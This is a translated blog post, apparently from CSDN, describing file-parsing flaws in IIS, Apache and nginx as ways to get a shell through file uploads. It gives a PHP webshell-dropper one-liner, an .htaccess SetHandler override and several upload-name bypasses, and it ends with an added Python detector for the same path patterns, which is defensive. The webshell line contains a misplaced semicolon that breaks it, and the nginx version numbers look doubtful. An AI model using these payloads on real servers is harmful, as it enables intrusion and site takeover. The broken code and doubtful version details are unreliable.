File parsing vulnerability

In some cases IIS, Apache, or nginx will parse certain specially named files as script files.

 

IIS 5.x / 6.0 parsing vulnerability:

1. Directory parsing

/xx.asp/xx.jpg

If a folder whose name ends in .asp or .asa is created under the website, any file in that directory, whatever its extension, will be parsed and executed by IIS as an ASP file.

For example, with a directory named xx.asp, xx.asp/1.jpg will be executed as an ASP file.

If you can control the file upload path, you can get a shell regardless of whether the image's name is changed after the upload.

At that point, connecting to /xx.asp/xx.jpg with the "kitchen knife" (Chopper) webshell client succeeds; if the path is just /.jpg it does not succeed, because the file is then treated as a picture, not as ASP.

2. File parsing

xx.asp;.jpg

Under IIS 6.0, whatever follows the semicolon is not parsed, so xx.asp;.jpg is treated as xx.asp. The default executable extensions are: xx.asa, xx.cer, xx.cdx

 

Apache parsing vulnerability

Apache evaluates a file's extensions from right to left. If an extension is not recognized, it moves on to the next one to the left.

A name such as xx.php.owf.rar or xx.php.xxxxx will do; in that case the file can only be parsed as xx.php.

 

IIS 7.0 / 7.5 and nginx <8.03 malformed-path parsing vulnerability

With Fast-CGI enabled (the default state), upload a file xxx.jpg with the following content:

<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>';)?>

Then request xxx.jpg/.php, and a one-line Trojan (webshell) file, shell.php, will be generated in that directory.

The vulnerability is triggered via www.xxx.com/xxx.jpg/*.php.

 

nginx <8.03 Null byte code execution vulnerability

Embed the PHP code in the picture, then visit: xxx.jpg%00.php

 

.htaccess file parsing

If a .htaccess file can be uploaded and takes effect, you can write:

<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

Then just upload the Trojan as shell.jpg, and it will be parsed as a PHP file.
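
From the defender's side, every case above leaves a recognizable shape in an upload name or request path. The following is an added example, not code from the original post: a small classifier that can be run over upload file names or access-log request paths. The names classify and RULES, the STATIC_EXT list and the sample paths are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

SCRIPT_EXT = r"(?:asp|asa|cer|cdx|php)"          # script types named on this page
STATIC_EXT = r"(?:jpg|jpeg|png|gif|rar|txt)"     # assumed list of allowed upload types

RULES = [
    # IIS 5.x/6.0: a file requested inside a directory named *.asp or *.asa
    ("iis6-script-directory", re.compile(r"/[^/]*\.(?:asp|asa)/[^/]+", re.I)),
    # IIS 6.0: everything after ';' in the file name is ignored (xx.asp;.jpg)
    ("iis6-semicolon", re.compile(rf"\.{SCRIPT_EXT};[^/]*$", re.I)),
    # Apache: .php followed by further extensions (xx.php.owf.rar)
    ("apache-multi-extension", re.compile(r"\.php(?:\.[^./;]+)+$", re.I)),
    # IIS 7.x / nginx with Fast-CGI: static file followed by /<anything>.php
    ("fastcgi-path-info", re.compile(rf"\.{STATIC_EXT}/[^/]*\.php$", re.I)),
    # nginx: null byte between the static name and .php (xxx.jpg%00.php)
    ("null-byte", re.compile(r"\x00")),
    # A .htaccess file being uploaded or requested
    ("htaccess", re.compile(r"(?:^|/)\.htaccess$", re.I)),
]

def classify(raw_path):
    """Return the names of all rules matched by a request path or upload name."""
    # Drop the query string, then percent-decode so %00 becomes a real NUL.
    path = unquote(raw_path.split("?", 1)[0])
    return [name for name, rx in RULES if rx.search(path)]

# Constructed sample input: one path per case described above, plus benign ones.
SAMPLE_PATHS = [
    "/xx.asp/xx.jpg",
    "/upload/xx.asp;.jpg",
    "/upload/xx.php.owf.rar",
    "/xxx.jpg/.php",
    "/xxx.jpg%00.php",
    "/upload/.htaccess",
    "/images/logo.jpg",
    "/index.php?id=1",
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        hits = classify(p)
        print(f"{p:28} {'SUSPICIOUS ' + ','.join(hits) if hits else 'ok'}")
```

An upload handler can reject any name for which classify returns a non-empty list; the same function can be applied to the request field of existing access logs to look for earlier attempts.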

 

Origin blog.csdn.net/qq_41723615/article/details/105491536